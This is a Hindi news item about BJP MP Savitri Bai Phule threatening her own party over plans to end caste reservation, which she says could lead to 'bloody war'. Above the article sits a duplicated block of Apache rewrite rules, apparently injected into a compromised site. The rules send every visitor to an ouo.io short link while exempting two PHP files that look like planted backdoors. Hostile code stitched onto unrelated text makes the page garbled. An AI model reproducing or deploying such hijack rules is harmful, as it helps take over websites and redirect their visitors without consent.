
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 570
लखनऊ। बीजेपी सांसद सावित्री बाई फुले से बगावती तेवर अपना लिए हैं। उन्होंने अपनी ही पार्टी को खुलेतौर पर धमकी देते हुए कहा कि यदि आरक्षण खत्म करने की साजिश बंद नहीं हुई तो जंग हो जाएगी। कुछ दिनों पहले ही फुले ने कहा था कि आरक्षण खत्म करने की साजिश हो रही है। उन्होंने इसके लिए अपनी ही पार्टी की केंद्र सरकार पर भी हमला बोला। लखनऊ में आयोजित 'संविधान व आरक्षण बचाओ' रैली में फुले ने कहा, 'आरक्षण हमें कोई भीख में नहीं मिला है, यह हमारे लिए प्रतिनिधित्व का मामला है। देश का सत्तारूढ़ वर्ग यदि संविधान बदलने की हिमाकत करेगा और आरक्षण खत्म करने की कोशिश करेगा, तो खूनी जंग शुरू हो सकती है।' उन्होंने कहा, 'हम अपने अधिकारों के लिए अपना जीवन दांव पर लगाने के लिए तैयार हैं। भारत का संविधान सही ढंग से लागू नहीं किया गया है और हम बहुजन लोगों को अब भी समानता का अधिकार नहीं दिया गया है।'
उन्होंनें कहा, 'हमें उसी संविधान की बदौलत मुख्यमंत्री या राष्ट्रपति बनने का अधिकार मिला है, जिसके खिलाफ आज साजिश की जा रही है। इसके पीछे कुछ वरिष्ठ नेता हैं और केंद्र सरकार की नीतियों की वजह से, एससी-एसटी और अल्पसंख्यकों को संविधान में मिला अधिकार खतरे में हैं। हम प्रमोशन और निजी क्षेत्र में भी आरक्षण की मांग कर रहे हैं।'